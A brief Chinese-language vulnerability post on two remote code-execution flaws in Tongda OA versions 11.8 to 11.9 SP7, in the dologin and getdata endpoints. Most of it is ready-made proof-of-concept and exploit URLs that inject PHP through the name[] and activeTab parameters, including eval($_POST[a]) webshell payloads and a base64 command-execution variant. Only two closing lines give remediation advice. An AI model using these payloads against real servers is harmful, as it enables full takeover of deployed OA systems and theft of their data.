通达OA11.9版本(包含SP7补丁)的dologin方法存在代码执行漏洞，攻击者可以通过漏洞执行任意代码，获取服务器权限，此类代码执行型漏洞影响范围（11.8-11.9sp7）。

通达OA v11.9 getdata接口存在任意命令执行漏洞，攻击者通过漏洞可以执行服务器任意命令控制服务器权限。

poc

http://xxxx:xx/general/appbuilder/web/portal/gateway/dologin?name[]=%E9%8C%A6%27.print_r(md5(123)),//

exp

http://x.x.x.x:x/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[a]))%3B/*&id=19&module=Carouselimage

poc

http://xxxx:xx/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22[base64加密的命令]%22)))%3B/*&id=19&module=Carouselimage

exp

http://xxxx:xx/general/appbuilder/web/portal/gateway/dologin?name%5B%5D=%E9%8C%A6%27.eval($_POST[a]),//

升级至11.x或者12.x最新版：https://www.tongda2000.com/

如非必要，禁止公网访问该系统。